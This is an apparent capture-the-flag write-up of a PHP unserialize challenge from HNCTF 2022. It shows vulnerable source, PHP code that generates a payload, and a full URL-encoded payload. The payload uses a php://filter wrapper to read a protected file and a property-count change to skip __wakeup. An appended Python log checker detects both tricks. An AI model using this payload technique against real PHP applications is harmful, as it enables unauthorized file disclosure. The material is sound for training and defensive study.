[HNCTF 2022 WEEK2] Daily Quick Look
2023-05-05 22:21:37 博客园



easy_unser

    // (The start of the challenge source is cut off on the page; it resumes inside the constructor of class body.)
            $this->want = $want;
            else $this->want = $this->todonothing;
        }
        function __wakeup(){
            $About_me = "When the object is unserialized,I will be called";
            $but = "I can CHANGE you";
            $this-> want = $but;
            echo "C1ybaby!";
        }
        function __destruct(){
            $About_me = "I'm the final function,when the object is destroyed,I will be called";
            echo "So,let me see if you can get what you want\n";
            if($this->todonothing === $this->want)
                die("鲍勃,别傻愣着!\n");
            if($this->want == "I can CHANGE you")
                die("You are not you....");
            if($this->want == "f14g.php" OR is_file($this->want)){
                die("You want my heart?No way!\n");
            }else{
                echo "You got it!";
                // File read driven by the deserialized property
                highlight_file($this->want);
            }
        }
    }

    class unserializeorder{
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
    ";
        function __sleep(){
            $About_me = "When the object is serialized,I will be called";
            echo "We Come To HNCTF,Enjoy the ser14l1zti0n
    ";
        }
        function __toString(){
            $About_me = "When the object is used as a string,I will be called";
            return $this->CORE;
        }
    }

    $obj = new unserializeorder();
    echo $obj;
    $obj = serialize($obj);

    if (isset($_GET["ywant"]))
    {
        // User-controlled input is passed straight to unserialize()
        $ywant = @unserialize(@$_GET["ywant"]);
        echo $ywant;
    }
    ?>

Output shown below the source:

    人类最大的敌人,就是无序. Yahi param vaastavikta hai!We Come To HNCTF,Enjoy the ser14l1zti0n

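From the code we can see that the flag is in f14g.php, so all we need is to find a point we can exploit.

Looking further up, highlight_file() in the body class can be used, so we need want to be the f14g.php we are after.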

    function __destruct(){
        $About_me = "I'm the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR is_file($this->want)){
            die("You want my heart?No way!\n");
        }else{
            echo "You got it!";
            highlight_file($this->want);
        }
    }

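However, the filtering here is fairly strict: if want=f14g.php, or if the file passed to is_file() exists, it returns "So,let me see if you can get what you want\n";

So we cannot set want=f14g.php directly. Here the php://filter wrapper can be used to display the f14g.php file: is_file() returns false for a php:// URL, and the string is not equal to "f14g.php", so both checks pass and highlight_file() reads the file through the wrapper.

The construction is as follows: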

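    <?php
    // Opening lines are missing from the page; class and property as they appear in the payload below.
    class body{
        private $want = "php://filter/resource=f14g.php";
    }
    $a=new body();
    echo urlencode(serialize($a));
    ?>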

payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}

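Note that the __wakeup magic method also has to be bypassed, which is why the number between the two %3A, originally 1, is now 2. That number is the declared property count; declaring more properties than the object actually carries makes affected PHP versions skip __wakeup.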
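
From the defender's side, the two traits of the payload above (a declared property count that does not match the properties present, and a stream-wrapper URL as a property value) can be checked for in request logs. The Python code below is an added example, not part of the original write-up or the challenge; the function names and the benign sample are made up for illustration, and it handles the N, i, b, d, r, R, s, a and O tags of PHP's serialize() format.

```python
import re
from urllib.parse import unquote_to_bytes
WRAPPER = re.compile(rb"^[a-z][a-z0-9.+-]*://", re.I)   # php://, phar://, data://, ...

def _num(buf, start):   # unsigned decimal ending at the next ':' -> (value, index of ':')
    colon = buf.index(b":", start)
    if not buf[start:colon].isdigit():
        raise ValueError("bad number")
    return int(buf[start:colon]), colon

def _parse(buf, pos, out):
    """Walk one serialized value at pos, append findings to out, return the next position."""
    tag = chr(buf[pos])                        # IndexError if the input is truncated
    if tag in "NibdrR":                        # N;  i:1;  b:0;  d:0.5;  r:1;
        return buf.index(b";", pos) + 1
    if tag == "s":                             # s:<byte length>:"<bytes>";
        n, colon = _num(buf, pos + 2)
        value = buf[colon + 2:colon + 2 + n]
        if WRAPPER.match(value):
            out.append(("stream-wrapper", value.decode("latin-1")))
        return colon + 2 + n + 2               # past the closing quote and ';'
    if tag in "aO":                            # a:<count>:{...}  O:<len>:"<class>":<count>:{...}
        pos += 2
        if tag == "O":
            name_len, colon = _num(buf, pos)
            pos = colon + 2 + name_len + 2     # past "<class>":
        declared, colon = _num(buf, pos)
        pos, seen = colon + 2, 0               # first byte after '{'
        while buf[pos:pos + 1] != b"}":
            pos = _parse(buf, pos, out)        # key or property name
            pos = _parse(buf, pos, out)        # value
            seen += 1
        if seen != declared:
            out.append(("count-mismatch", f"declared {declared}, found {seen}"))
        return pos + 1
    raise ValueError(f"unsupported tag {tag!r}")

def inspect_param(param):
    """Return findings for one URL-encoded parameter value taken from a request log."""
    out = []
    try:
        _parse(unquote_to_bytes(param), 0, out)
    except (ValueError, IndexError, RecursionError):
        out.append(("malformed", "unsupported or malformed serialize() data"))
    return out

PAGE_PAYLOAD = ('O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3B'   # ywant value from this page
                's%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}')
BENIGN = 'a:2:{s:4:"lang";s:2:"en";s:4:"page";i:3;}'   # constructed benign sample
```

inspect_param(PAGE_PAYLOAD) reports both the stream wrapper and the count mismatch, while the benign array produces no findings.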
